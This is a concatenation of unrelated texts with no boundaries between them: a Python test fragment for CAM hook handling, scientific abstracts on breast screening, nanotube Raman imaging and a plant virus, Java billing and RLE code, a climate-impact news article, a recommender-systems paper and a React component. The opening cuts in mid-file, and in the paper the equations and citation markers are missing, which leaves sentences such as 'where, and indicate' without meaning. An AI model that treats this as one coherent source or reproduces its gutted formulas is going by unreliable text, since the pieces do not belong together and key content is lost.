only one hook on the model assert extractor.hook_a is None with torch.no_grad(): _ = model(torch.rand((1, 3, 32, 32))) assert extractor.hook_a is not None # Remove it extractor.clear_hooks() assert len(extractor.hook_handles) == 0 # Check that there is no hook anymore extractor.hook_a = None with torch.no_grad(): _ = model(torch.rand((1, 3, 32, 32))) assert extractor.hook_a is None def test_cam_repr(mock_img_model): model = mock_img_model.eval() extractor = core._CAM(model, '0.3') assert repr(extractor) == "_CAM(target_layer='0.3')"
The incremental contribution of clinical breast examination to invasive cancer detection in a mammography screening program. OBJECTIVE The objective of this study was to determine the potential added contribution of clinical breast examination (CBE) to invasive breast cancer detection in a mammography screening program, by categories of age and breast density. SUBJECTS AND METHODS We prospectively followed 61,688 women aged 40 years or older who had undergone at least one screening examination with mammography and CBE between January 1, 1996, and December 31, 2000, for 1 year after their mammogram for invasive cancer. We computed the incremental sensitivity, specificity, and positive predictive value of CBE over mammography alone for combinations of age and breast density (predominantly fatty or dense). RESULTS Mammography sensitivity was 78% and combined mammography-CBE sensitivity was 82%, thus CBE detected an additional 4% of invasive cancers. CBE detected a minority of invasive cancers compared with mammography for all age groups and all breast densities. Sensitivity increased from adding CBE to screening mammography for all ages, from 6.8% in women ages 50-59 with dense breasts to 1.8% in women ages 60-69 years with fatty breasts. CBE generally added incrementally more to sensitivity among women with dense breasts. Specificity and positive predictive value declined when CBE was used in conjunction with mammography, and this decrement was more pronounced in women with dense breasts. CONCLUSION CBE had modest incremental benefit to invasive cancer detection over mammography alone in a screening program, but also led to greater risk of false-positive results. These risks and benefits were greater in women with dense breasts. The balance of risks and benefits must be weighed carefully when evaluating the inclusion of CBE in a screening examination.
Anharmonic Effects in Single-Walled Carbon Nanotubes Analyzed through Low-Temperature Raman Imaging The high thermal conductivity of single-walled carbon nanotubes (SWCNTs) has gained much attention for their applications in potential thermal devices. Here, we investigate anharmonic effects, originated from phonon interactions, of SWCNT bundles by temperature dependent Raman imaging using our home-built mini cryostat system. The cryostat system is small enough to be mounted on a piezo scanner that suppresses thermal drift, enabling Raman imaging at different temperatures. We obtained Raman spectral images of several SWCNT bundles with a spatial resolution of a few hundred nanometers at different temperatures. We found that different bundles show different temperature dependences of Raman peak intensity, shift, and width. The temperature dependence was further elucidated by considering the sample topography observed by atomic force microscopy, where bundle effects seem to play an important role to influence the anharmonicity. The temperature-dependent Raman analysis based on spatially resolved imaging will be a powerful tool to investigate anharmonic effects of advanced carbon nanomaterials as well as to realize in situ visualization of thermal properties for future thermal devices.
package com.ycsoft.business.dto.core.prod; import com.ycsoft.beans.core.prod.CProd; public class CProdDto extends CProd { /** * */ private static final long serialVersionUID = -2590105154516096344L; private String is_invalid_tariff; private String is_zero_tariff;// 是否零资费 private String allow_pay;// 是否可以续费 private String tariff_name; // 产品资费名称 private String next_tariff_name; // 产品资费名称 private String package_name; private Integer tariff_rent; private String billing_type; private Integer billing_cycle; private Integer owe_fee;//累计欠费 private Integer real_bill;//本月欠费 private Integer all_balance;//余额active_balance+order_balance private String stb_id; private String card_id; private String modem_mac; private String has_dyn; //是否有动态资源('T','F') private String is_pause="F"; //是否能暂停(默认不能暂停) private Integer inactive_balance; private String month_rent_cal_type; private Integer real_balance; private Integer active_balance; private Integer real_fee; private String p_bank_pay; public String getMonth_rent_cal_type() { return month_rent_cal_type; } public void setMonth_rent_cal_type(String month_rent_cal_type) { this.month_rent_cal_type = month_rent_cal_type; } public String getTariff_name() { return tariff_name; } public void setTariff_name(String tariff_name) { this.tariff_name = tariff_name; } public String getStb_id() { return stb_id; } public void setStb_id(String stbId) { stb_id = stbId; } public String getCard_id() { return card_id; } public void setCard_id(String cardId) { card_id = cardId; } public String getModem_mac() { return modem_mac; } public void setModem_mac(String modemMac) { modem_mac = modemMac; } public Integer getBilling_cycle() { return billing_cycle; } public void setBilling_cycle(Integer billingCycle) { billing_cycle = billingCycle; } public String getNext_tariff_name() { return next_tariff_name; } public void setNext_tariff_name(String next_tariff_name) { this.next_tariff_name = next_tariff_name; } public String getIs_zero_tariff() { return is_zero_tariff; } public void setIs_zero_tariff(String is_zero_tariff) { this.is_zero_tariff = is_zero_tariff; } public String getAllow_pay() { return allow_pay; } public void setAllow_pay(String allow_pay) { this.allow_pay = allow_pay; } public String getPackage_name() { return package_name; } public void setPackage_name(String package_name) { this.package_name = package_name; } public Integer getTariff_rent() { return tariff_rent; } public void setTariff_rent(Integer tariff_rent) { this.tariff_rent = tariff_rent; } public String getBilling_type() { return billing_type; } public String getIs_invalid_tariff() { return is_invalid_tariff; } public void setIs_invalid_tariff(String is_invalid_tariff) { this.is_invalid_tariff = is_invalid_tariff; } public void setBilling_type(String billingType) { billing_type = billingType; } public Integer getOwe_fee() { return owe_fee; } public void setOwe_fee(Integer owe_fee) { this.owe_fee = owe_fee; } public Integer getAll_balance() { return all_balance; } public void setAll_balance(Integer all_balance) { this.all_balance = all_balance; } public Integer getReal_bill() { return real_bill; } public void setReal_bill(Integer real_bill) { this.real_bill = real_bill; } public String getHas_dyn() { return has_dyn; } public void setHas_dyn(String has_dyn) { this.has_dyn = has_dyn; } public String getIs_pause() { return is_pause; } public void setIs_pause(String is_pause) { this.is_pause = is_pause; } public Integer getInactive_balance() { return inactive_balance; } public void setInactive_balance(Integer inactive_balance) { this.inactive_balance = inactive_balance; } /** * @return the real_balance */ public Integer getReal_balance() { return real_balance; } /** * @param real_balance the real_balance to set */ public void setReal_balance(Integer real_balance) { this.real_balance = real_balance; } /** * @return the active_balance */ public Integer getActive_balance() { return active_balance; } /** * @param active_balance the active_balance to set */ public void setActive_balance(Integer active_balance) { this.active_balance = active_balance; } /** * @return the real_fee */ public Integer getReal_fee() { return real_fee; } /** * @param real_fee the real_fee to set */ public void setReal_fee(Integer real_fee) { this.real_fee = real_fee; } public String getP_bank_pay() { return p_bank_pay; } public void setP_bank_pay(String p_bank_pay) { this.p_bank_pay = p_bank_pay; } }
Effect of Plant Growth Promoting Microorganisms on Pepper Plants Infected with Tomato Brown Rugose Fruit Virus Symbiotic interaction between plants and microorganisms in the rhizosphere is an important factor affecting plant growth and fitness. Arbuscular mycorrhiza fungi symbiosis increases resistance of the plants to stress factors, including pathogens. Tomato brown rugose fruit virus (ToBRFV) is an important destructive virus damaging tomatoes and peppers with losses that can reach 100%. It is listed on the list of current quarantine organisms in the Czech Republic. The aim of this study was to evaluate influence of root colonization with Funneliformis mosseae or/and Azospirillum brasilense on ToBRFV symptoms and viral titre reduction. Plants treated with arbuscular mycorhizal fungi (AMF) had lower symptom emergence after 14 dpi, however there was no difference in symptoms emergence after 21 dpi within all treatments. The highest colonization intensity by Funneliformis mosseae was detected in ToBRFV negative plants treated with both AMF and Azospirillum (AZO) and the lowest in ToBRFV positive plants with the same treatment (AMF + AZO). Colonization intensity of Azospirillum brasilense in all treated variants went from 20% to 41%. Results suggest that the combination of those two beneficial microorganisms in ToBRFV-infected plants negatively affected AMF colonization.
//Program to decode RLE data public class Main { public static void main(String[] args) { //the data that has to be decoded byte data[] = {3,15,6,4}; //the decoded data //calling method decodeRLE() byte decoded[] = decodeRLE(data); //print the decoded data for(int i=0;i<decoded.length;i++){ System.out.println(decoded[i]); } } //method decodedRLE public static byte[] decodeRLE(byte[] rleData){ //size of the data that has to be decoded int n = rleData.length; //array to store the numbers which represent the repeating data byte repeats[] = new byte[n/2]; //array to store the numbers that have to be repeated byte data2[] = new byte[n/2]; //size of the new decoded array int size = 0; int j = 0; //find the repeats for(int i=0;i<n;i+=2){ repeats[j] = rleData[i]; size += repeats[j]; j++; } j=0; //find the numbers that have to be repeated for(int i=1;i<n;i+=2){ data2[j] = rleData[i]; j++; } //create new array to store the decoded data byte decode[] = new byte[size]; int l=0; //decode the data //use two for loops for (int i=0;i<n/2;i++){ for(byte k=0;k<repeats[i];k++){ decode[l] = data2[i]; l++; } } //return the decode array return decode; } }
Global warming is disrupting wildlife and the environment on every continent, according to an unprecedented study that reveals the extent to which climate change is already affecting the world's ecosystems. Scientists examined published reports dating back to 1970 and found that at least 90% of environmental damage and disruption around the world could be explained by rising temperatures driven by human activity. Big falls in Antarctic penguin populations, fewer fish in African lakes, shifts in American river flows and earlier flowering and bird migrations in Europe are all likely to be driven by global warming, the study found. The team of experts, including members of the UN's intergovernmental panel on climate change (IPCC) from America, Europe, Australia and China, is the first to formally link some of the most dramatic changes to the world's wildlife and habitats with human-induced climate change. In the study, which appears in the journal Nature, researchers analysed reports highlighting changes in populations or behaviour of 28,800 animal and plant species. They examined a further 829 reports that focused on different environmental effects, including surging rivers, retreating glaciers and shifting forests, across the seven continents. To work out how much - or if at all - global warming played a role, the scientists next checked historical records to see what impact natural variations in local climate, deforestation and changes in land use might have on the ecosystems and species that live there. In 90% of cases the shifts in wildlife behaviour and populations could only be explained by global warming, while 95% of environmental changes, such as melting permafrost, retreating glaciers and changes in river flows were consistent with rising temperatures. "When we look at all these impacts together, it is clear they are across continents and endemic. We're getting a sense that climate change is already changing the way the world works," said lead author Cynthia Rosenzweig, head of the climate impacts group at Nasa's Goddard Institute for Space Studies in New York. Most of the reports examined by the team were published between 1970 and 2004, during which time global average temperatures rose by around 0.6C. The latest report from the IPCC suggests the world is likely to warm between 2C and 6C by the end of the century. "When you look at a map of the world and see where these changes are already happening, and how many species and systems are already responding to climate change after only a 0.6C rise, it just heightens our concerns for the future," Rosenzweig said. "It's clear we have to adapt to climate change as well as try to mitigate it. It's real and it's happening now." A large number of the studies included in the team's analysis reveal stark changes in water availability as the world gets warmer. In many regions snow and ice melts earlier in the year, driving up spring water levels in rivers and lakes, with droughts following in the summer. Understanding shifts in water availability will have a big impact on water management and be critical to securing supplies, the scientists say. By collecting disparate reports on wildlife and ecosystems, it is possible to see how disruption to one part of the environment has knock-on effects elsewhere. In one study rising temperatures caused sea ice in Antarctica to vanish, prompting an 85% fall in the krill population. A separate study found that the population of Emperor penguins, which feed on krill in the same region, had also fallen by 50% during one warm winter. A loss of krill, also a dietary staple for whales and seals, was cited as a factor in recent accounts of cannibalism among polar bears in the Arctic. In 2006 Steven Amstrup, a world expert in polar bears at the US Geological Society, investigated three cases of the animals preying on one another in the southern Beaufort sea. A lack of their usual prey may have prompted the bears to turn on each other. Other reports show how the early arrival of spring in Europe has far-reaching effects down the food chain. The warmer weather causes trees to unfurl their leaves earlier, which causes a rise in leaf-eating grub numbers sooner in the year. Blue tits that feed on the grubs have largely adapted to the shift, by giving birth to their young two weeks earlier. "It was a real challenge to separate the influence of human-caused temperature increases from natural climate variations or other confounding factors, such as land-use changes or pollution," said David Karoly, a co-author based at Melbourne University in Australia.
Combining Privileged Information to Improve Context-Aware Recommender Systems A recommender system is an information filtering technology which can be used to predict preference ratings of items (products, services, movies, etc) and/or to output a ranking of items that are likely to be of interest to the user. Context-aware recommender systems (CARS) learn and predict the tastes and preferences of users by incorporating available contextual information in the recommendation process. One of the major challenges in context-aware recommender systems research is the lack of automatic methods to obtain contextual information for these systems. Considering this scenario, in this paper, we propose to use contextual information from topic hierarchies of the items (web pages) to improve the performance of context-aware recommender systems. The topic hierarchies are constructed by an extension of the LUPI-based Incremental Hierarchical Clustering method that considers three types of information: traditional bag-of-words (technical information), and the combination of named entities (privileged information I) with domain terms (privileged information II). We evaluated the contextual information in four context-aware recommender systems. Different weights were assigned to each type of information. The empirical results demonstrated that topic hierarchies with the combination of the two kinds of privileged information can provide better recommendations. I. INTRODUCTION A recommender system is an information filtering technology which can be used to predict preference ratings of items (products, services, movies, etc) and/or to output a ranking of items that are likely to be of interest to the user. This kind of system has emerged in order to reduce the difficulty of users to choose the product or service that most meets their needs. Many areas have been using recommender systems, mainly some web sites, like Amazon 1, Netflix 2 and Last.fm 3. Recommender systems usually use web access logs which represent the interaction activity between users and items. Traditional recommender systems consider only the two entities, items and users, to build the recommendation model. However, the use of contextual information can improve the recommendation process in some cases,. The researchers that already investigated the use of context discovered that the quality of recommendations increases when additional information, like time, place, and so on, is used. The concept context can assume different definitions. In this paper we consider that context is any information that can be used to characterize the situation of an entity. An example of application in which to consider contextual information can be important is movie recommendation. An user can prefer watch a love story with his girlfriend on Saturday night and a comedy with his friends during the week. So an online video store can recommend the movie that more corresponds to the users context. Although the proven importance of the use of contextual information in the recommendation process, there is still a lack of automatic methods to obtain such information. In a contextaware recommender system is possible to consider the context of the user or the context of the item. In this work we focus on the context extracted for the items (in our case, web pages). The contextual information can be represented and structured in various ways. A form of organizing this information is using hierarchical structures. In and, the researchers represented the context as trees. Given this possibility of hierarchical organization of context, we have been using topic hierarchies as a way to organize and extract the context of the textual content of web pages,. Most of the methods in the literature to build topic hierarchies represent the texts as a traditional bag-of-words, i.e., these methods consider the terms of texts as a disordered set of words. In, we constructed topic hierarchies of web pages by using traditional bag-of-words, and the extracted topics were used as context of these pages in context-aware recommender systems. However, Marcacini and Rezende proposed a method, called LUPI-based Incremental Hierarchical Clustering (LIHC) to construct topic hierarchies that uses besides the bag-of-words (technical information), also the privileged information, which is a more valuable kind of information extracted from texts. In, we constructed topic hierarchies of the web pages using the method LIHC. We considered the bag-of-words and the named entities, extracted from the web pages, as privileged information, and we used the topics as the contextual information of the web pages in context-aware recommender systems. However, named entities are one of the various types of information that can be considered as privileged information. The original LIHC method used only one type of privileged information to construct the topic hierarchies, in other words, it did not work with more than a kind of privileged information at the same time. In this paper we extend the method LIHC to be able to work with two kinds of privileged information, i.e., to construct topic hierarchies using besides the technical information, also other two kinds of information (privileged information). So, we propose to use topic hierarchies constructed by using three kinds of information: bag-of-words (technical information), named entities (privileged information I) and domain terms (privileged information II). The aim of this work is to combine this information and evaluate the impact of the use of the topics extracted from this combination as contextual information in context-aware recommender systems. This paper is structured as follows: in Section II, we report the related work. In Section III, we present our proposal. We evaluate our proposal in Section IV. And, finally, in Section V, we present conclusion and future work. II. RELATED WORK There are three different ways to acquire contextual information: explicitly, implicitly and inferred. The explicit acquisition methods collect the contextual information through direct questions to the users. The implicit acquisition methods get contextual information directly from Web data or environment. The inference methods obtain contextual information using data an text mining techniques. In this paper, we infer context from web pages using text mining techniques. Following, some related works are presented. In, Li et al. proposed methods to extract contextual information from online reviews. They investigated available restaurant review data and four types of contextual information for a meal: the company (if the meal involved multiple people), occasion (for which occasions is the event), time (what time of the day) and location (in which city the event took place). They developed their algorithms by using existing natural language processing tools such as GATE tool 4. Hariri et al. introduced a context-aware recommendation system that obtains contextual information by mining hotel reviews made by users, and combine them with user's rating historic to calculate a utility function over a set of items. They used a hotel review dataset from "Trip Advisor website" 5. The methods proposed by Li et al. and Hariri et al. assume there are explicit contextual information in reviews, and such information is obtained for each review by mapping it to the labels. Therefore, they use supervised methods to learn the labels. The advantage of our proposal is that it exploits unsupervised methods to learn topic hierarchies. Therefore, it does not need a mapping between reviews and labels. Aciar proposed a technique to detect sentences of reviews with contextual information. She applied text mining tools to define sets of rules for identifying such sentences with context. In her work the phrases are classified into two categories: "Contextual" and "Preferences". The category "Contextual" groups phrases that present information on the context in which the review was written. The category "Preferences" groups phrases that present information about the features that consumers evaluated. Our work differs from the Aciar's method since it is capable of using more text mining techniques, and these techniques are unsupervised, to extract contextual information. Aciar uses supervised techniques and conduct the evaluation of her method by using a case study, i.e., she does not compare her method results against other methods in the literature. Besides, she does not discuss the use of the extracted information in the recommendation process. Ho et al. proposed an approach to mine future spatiotemporal events from news articles, and thus provide information for location-aware recommendation systems. A future event consists of its geographic location, temporal pattern, sentiment variable, news title, key phrase, and news article URL. Besides that, their method is unsupervised and also extracts topics. In, the contextual information that Ho et al. extracted are related to time and local. The information of time is extracted from the timestamp of the article publication. To extract information of local, they also used named entity recognition. However, they did not evaluate the impact of the contextual information that they extracted in the recommender systems. The authors only presented some results about the evaluation of the context extraction process. Bauman and Tuzhilin presented a method to find relevant contextual information from reviews of users. In this method, the reviews are classified as "specific" and "generic". They found that contextual information is contained mainly in the specific reviews, which are those that describe specific visits of a user to an establishment. Therefore, the context is extracted from the "specific" reviews by means of two methods: "word-based" and "LDA-based". In, Bauman and Tuzhilin consider that the contextual information is not known a priori. Besides that, their method is unsupervised and also extracts topics. Our method differs from theirs since it extracts topics using also privileged information, which enrich the contextual information. Our method has many advantages over the other ones proposed in the literature. In general, it does not need previous information (for example, labels). It uses unsupervised methods and combines technical information with privileged information, which enriches the contextual information. Additionally, the context extracted is about the item (web pages) and not the user. Finally, our results, presented in Section IV, demonstrate that our contextual information is able to improve the quality of recommendations. III. OUR PROPOSAL As already stated, the term context can assume many definitions depending on what area it is being treated in. We consider the definition given by Dey that says: "Context is any definition that can be used to characterize the situation of an entity". In our work the entities are web pages (items). Besides the definition, the contextual information can be represented using many structures. Some researchers treat the context as a hierarchical structure and represent it using trees. For example, Panniello and Gorgoglione represent the attribute "period of year" as a tree like illustrated in Figure 1. The idea of this research is representing the contextual information using a hierarchical structure called topic hierarchy. Topic hierarchies organize texts into groups and subgroups, and for each group, topics are extracted to represent the main issue of the group. Constructing a topic hierarchy of the items in a recommender system means grouping them by context, i.e., the topics extracted for each group represent the context of the group. Items of a same group are in the same context. We construct topic hierarchies by using the textual content of the web pages, and use the topics as contextual information in context-aware recommender systems. Topics hierarchies can be constructed using hierarchical clustering. Traditional methods represent the textual collection as a bag-of-words, also known as technical information. However, we can extract concepts from the texts that are not represented in a simple bag-of-words. Named entities and domain terms are good examples of concepts that may be formed by a word or by more than a word and that are identified and extracted by using more advanced text preprocessing techniques. Thus, these two kinds of information, named entity and domain term, are considered in this paper as privileged information. The term Named Entity was born in the Message Understanding Conferences (MUC) and includes names of people, organizations and locations, besides numeric expressions like time, date, money and percent expressions. The named entity recognition is a task that involves identifying words or expressions that belong to categories of named entities. For example, in the sentence: "Ana Maria works at Petrobras, in Brazil, since 1989". "Ana Maria" is recognized as a person, "Petrobras" as an organization, "Brazil" as a location and "1989" as a date. Despite the importance of term extraction task, there is still no consensus on the formal definition of what the "term" is. A definition widely accepted of term is given by Cabr and Vivaldi, which is: "terminological unit obtained from specialized domain". In most researches found in literature, the authors state that terms are generally nominal units, since they describe concepts. For example, in the Ecologic domain, the terms "climate", "plant", "Atlantic forest" and "soil moisture" are examples of domain terms. The terms are used in applications such as information retrieval, information extraction and summarization. In our proposal, we instantiate the LUPI-based Incremental Hierarchical Clustering (LIHC) method to construct topic hierarchies using one type of privileged information and technical information..., d n } the sets of documents represented by the privileged information (totaling m documents) and with technical information (totaling n documents), respectively, where d p ∈ D p and d t ∈ D t. Note that the number of documents represented by the privileged information, in general, is smaller than the number of documents represented by technical information, i.e, m ≤ n. This is due to the fact that a significant number of documents do not contain features extracted from privileged information (e.g., named entities and domain terms). The subset of documents that contain the privileged information and technical information, is used for learning the initial clustering model. In this case, various clustering algorithms are run (or repeated runs of the same algorithm with different parameter values) to obtain several clusters from the subset Y. To aggregate the generated clusters, the LIHC method obtains two co-association matrices M t (i, j) and M p (i, j) which represent, respectively, the technical information (bag-of-words) clustering model and privileged information clustering model. The combination of these two clustering models is performed by using a consensual co-association matrix: for all items i and j. In this case, the parameter is a combination factor (0 ≤ ≤ 1) that indicates the importance of the privileged information space in the final co-association matrix. The initial model of the LIHC method is obtained by applying any hierarchical clustering algorithm from the matrix M F. The remaining text documents, i.e., the documents without privileged information, are inserted incrementally into hierarchical clustering by using the nearest neighbor technique. For the construction of topic hierarchies, the topic extraction is based on selection of the most frequent terms of each cluster. In, we constructed topic hierarchies of the web pages by using the method LIHC and considering as privileged information only named entities. In this paper, we construct topic hierarchies by combining named entities and domain terms as privileged information, varying the weight of each type of information. To incorporate the two types of privileged information, the method LIHC was extended as follows. First, D pri is divided into two sets D ne (the set of the privileged information I named entities) and D dt (the set of the privileged information II domain terms). Let D ne = {d ne 1,..., d ne r } be the set of documents with named entities (totaling r documents) and D dt = {d dt 1,..., d dt s } be the set of documents with domain terms (totaling s documents). Similarly, the matrix M p (i, j) is divided into two matrices M ne (the named entities clustering model) and M dt (the domain terms clustering model). The combination of the three clustering models (M t, M ne and M dt ) is performed by using the follow consensual co-association matrix: where, and indicate the importance of the named entities and domain terms, respectively, in the final co-association matrix, and + =. In the next section, we empirically evaluate our proposal by using different values of, and to construct the topic hierarchies. IV. EMPIRICAL EVALUATION The aim of our work is to study the impact of the context, extracted by our method, in context-aware recommender systems. So, the empirical evaluation consists of comparing the results of the algorithms C. Reduction, DaVI-BEST, Weight PoF and Filter PoF, all them using our contextual information, against the uncontextual algorithm Item-Based Collaborative Filtering (IBCF). In this way, we compared the quality of the recommendations generated by using our context against the quality of the recommendations generated without using contextual information. In this section, we present the necessary details to understand our experiments: data set, baseline, context-aware recommender algorithms, experimental setup, evaluation measure and the results. A. Data Set In the experiments we used a data set from a Portuguese website about agribusiness that consists of 4,659 users, 15,037 accesses and 1,543 web pages written in Portuguese language. To construct the topic hierarchies for these web pages, we used the textual content of the pages, eliminating header, footer and everything that do not pertaining to the main textual content. We preprocessed the texts executing traditional text preprocessing tasks: stopword removal and stemming. The representations or "term value matrix" were constructed using the term weighting measure TF-IDF (term frequency-inverse document frequency). Three representations were constructed: the traditional bag-of-words representation (technical information), the named entities representation (privileged information I) and the domain terms representation (privileged information II). We defined the weights testing different combinations of the two kinds of privileged information. The weights are shown in Table I. We extracted the topics from the topic hierarchies considering three configurations {50, 100}, {15, 20} and {2, 7}. In this configuration {x, y}, that represents the granularity level, the parameter x identifies the minimum number of items allowed in the topic, while the parameter y identifies the maximum number of items per topic. Topics with more items associated to them mean topics more generic, while topics with fewer items associated to them mean topics more specific. So, the topics extracted by the configuration {50, 100} are more generic and the topics extracted by the configuration {2, 7} are more specific. The configuration {15, 20} are between the two others, and it was chosen because, in previous experiments, we obtained good results using this granularity level. Besides that, the more generic configuration extracts a lower number of topics, while the more specific configuration extracts a higher number of topics. Therefore, using this configuration we can analyses if the number of topics extracted or the granularity level of this topics influences the quality of the recommendations. In Table II, we can see the number of topics extracted using each configuration. B. Supporting Tools and Methods In the experiments we used JPretext 6 and LIHC 7 for the pre-processing and the hierarchical clustering of the items. These two tools are part of Torch, that is a set of tools developed to support text clustering and construction of topic hierarchies. JPretext transforms the collection of texts in a "term value matrix" and LIHC tool implements the LUPIbased Incremental Hierarchical Clustering method. The named entity recognition was performed by using REMBRANDT, a system that recognizes classes of named entities, like things, location, organization, people and others, in texts written in Portuguese. REMBRANDT uses Wikipedia 8 as knowledge base for the classification of the entities. Lastly, for the domain term extraction we used the method MATE-ML (Automatic Term Extraction based on Machine Learning),. This method uses machine learning incorporating rich features of candidate terms. The steps of MATE-ML are: 1) Text Pre-Processing; 2) Extraction of linguistic, statistic and hybrid features; 3) Application of filters; and 4) Generation of inductive models based on machine learning. C. Baseline In this paper we considered the un-contextual algorithm Item-Based Collaborative Filtering (IBCF) as baseline. Let m be the number of users U = {u 1, u 2,..., u m } and n the number of items that can be recommended I = {i 1, i 2,..., i n }. An item-based collaborative filtering model M is a matrix representing the similarities among all pairs of items, according to a similarity measure. We used the cosine angle similarity measure, defined as: where − → i 1 and − → i 2 are rating vectors and the operator "" denotes the dot-product of the two vectors. In our case, as we are dealing only with implicit feedback, the rating vectors are binary. The value 1 means that the user accessed the respective item, whereas the value 0 is the opposite. Given an active user u a and his set of observable items O ⊆ I, the N recommendations are generated as follows. First, we identify the set of candidate items for recommendation R by selecting from the model all items i / ∈ O. Then, for each candidate item r ∈ R, we calculate its recommendation score as: where K r is the set of the k most similar items to the candidate item r. The N candidate items with the highest values of score are recommended to the user u a. All the context-aware recommendation algorithms used in this work are based on the Item-Based Collaborative Filtering. They are presented in the next section. D. Context-Aware Recommender Systems Context-aware recommender systems (CARS) learn and predict the tastes and preferences of users by incorporating available contextual information in the recommendation process. According to Adomavicius and Tuzhilin, contextual information can be applied at various stages of the recommendation process. Following this criterion, these systems can be divided into three categories: contextual pre-filtering, contextual modeling and contextual post-filtering. In this work, we evaluate the effects of using the contextual information, obtained from topic hierarchies, in four different context-aware recommender systems: C. Reduction (Pre-filtering approach): in pre-filtering approaches the contextual information is used as a label for filtering out those data that do not correspond to the specified contextual information. The remaining data that passed the filter (contextualized data) is used to generate the model. C. Reduction uses the contextual information as label to segment the data. A recommendation method is run for each contextual segment to determine which segment outperforms the traditional un-contextual recommendation model. The best contextual model is chosen to make the recommendation. Here the best model is the one that has the highest F1 measure. DaVI-BEST (Contextual modeling approach): in this approach the context is used in the recommendation model, i.e., the contextual information is part of the model together with user and item data. DaVI-BEST considers the contextual information as virtual items, using them along with the actual items in the recommendation model. All contextual information are evaluated and it is selected the dimension which better outperforms the traditional un-contextual recommendation model to make contextual recommendations. Weight PoF and Filter PoF (Contextual postfiltering approaches): these approaches use the contextual information to reorder and filter out the recommendation, respectively. Firstly, they apply the traditional algorithm to build the un-contextual recommendation model, ignoring the contextual information. Then, the probability of users to access the items given the right context is calculated. This probability is multiplied by scores of items to reorder the recommendations (Weight PoF) or is used as a threshold to filter them (Filter PoF). E. Experimental Setup and Evaluation Measures The protocol considered in this paper to measure the predictive ability of the recommender systems is the All But One protocol with 10-fold cross validation, i.e., the set of documents is partitioned into 10 subsets. For each fold we use n − 1 of these subsets for training and the rest for testing. The training set T r is used to build the recommendation model. For each user in the test set T e, an item is hidden as a singleton set H. The remaining items represent the set of observable items O, that is used in the recommendation. Then, we compute Mean Average Precision (M AP @N ), where N equals 5 and 10 recommendations. For each configuration and measure, the 10-fold values are summarized by using mean and standard deviation. To compare two recommendation algorithms, we applied the two-sided paired t-test with a 95% confidence level. In our empirical evaluation, we used the 4 most similar items to make the recommendations and 0.1 as a threshold in Filter PoF to filter out the recommendations, since these values provided the best results for this experiment. F. Results In Table III, we show the results of our ranking evaluation by means of M AP @N. The results are obtained at four values of the combination factor ( = 0.3, = 0.5, = 0.7 and = 1) and at three granularity levels, as described in Section IV-A. For each value of combination factor we also have the weights of each type of privileged information. To facilitate the understanding of the results, we mentioned the weight of technical information as BOW, the weight of the named entities as NE and the weight of domain terms as DT. The presented results are for the three context-aware recommendation algorithms (C. Reduction, Weight PoF and Filter PoF), and also for the baseline IBCF. The DaVI-BEST results are not presented because they are equivalent to the IBCF results. So, there is no improvement by using this algorithm and the contextual information extracted with our proposal. The analysis of the results can be divided into 3 questions: 1) What is the algorithm with the best results?; 2) What is the granularity with the best results?; and 3) What is the value of combination factor with the best results? Answering the first question, we can observe that the algorithm Weight PoF presented the best results. This algorithm was also better than the baseline with statistical significance in all the experiments. For the second question, each algorithm was better at different granularity levels. The C. Reduction and Weight PoF algorithms presented the best results at configuration {15, 20}, while the Filter PoF algorithm presented the best results at configuration {2, 7} (topics more specifics). The topics extracted by the configuration {50, 100} presented values of MAP not as high as for the others configurations, which shows that it is better to consider more specific topics and in larger amount. In the graphic of Figure 2, we can analyze the best results of our experiments, i.e., the results for = 0.3 (BOW = 70%, EN = 10% and DT = 20%). The x-axis represents the granularities levels while the y-axis represents the values of MAP@10. Each line of the graphic is a recommender algorithm. It is evident that the three context-aware algorithms presented better results than the baseline IBCF, only Filter PoF presented a lower value of MAP at the granularity {50, 100}. At the granularity {2, 7}, this same algorithm presented better results than the others algorithms, what shows that this algorithm presents high values of MAP when topics more specifics are used. The algorithms Weight PoF and Filter PoF presented the best values of MAP at the granularity {15, 20}, being the Weight PoF the best of them. V. CONCLUSION In this paper, we proposed to use contextual information from topic hierarchies, constructed by LIHC method, to improve the accuracy of context-aware recommender systems. The topic hierarchies was constructed considering traditional bag-of-words (technical information), and the combination of named entities (privileged information I) and domains terms (privileged information II). The empirical evaluation showed that by using topics from the topic hierarchies with combined privileged information as contextual information, contextaware recommender systems can provide better recommendations. The contextual information obtained from the three topic hierarchies improved the recommendations in 3 out of 4 recommender systems evaluated in this paper: C. Reduction, Weight PoF and Filter PoF (in most of the experiments). As future work, we will finish some experiments in which we are comparing the combined use of the two types of privileged information against the results of our previous studies using named entities and domain terms separately. Additionally, we will also compare our proposal against other baselines proposed in the literature.
<reponame>luishsf/practice import React from "react"; import { Container, Button, Typography, makeStyles } from "@material-ui/core"; import { Link } from 'react-router-dom'; const useStyles = makeStyles({ container: { display: "flex", flexDirection: "column", justifyContent: 'center', textAlign: 'center', flexWrap: 'wrap', marginTop: '60px', }, }); export const NoCredits = () => { const classes = useStyles(); return ( <Container className={classes.container}> <Typography style={{ color: 'white', marginBottom: 20}} variant='h3'> Saldo Insuficiente </Typography> <Link style={{ textDecoration: 'none' }} to={`/payment`}> <Button variant="contained" color="secondary"> <span style={{ color: 'white' }}>Comprar Créditos</span> </Button> </Link> </Container> ); };
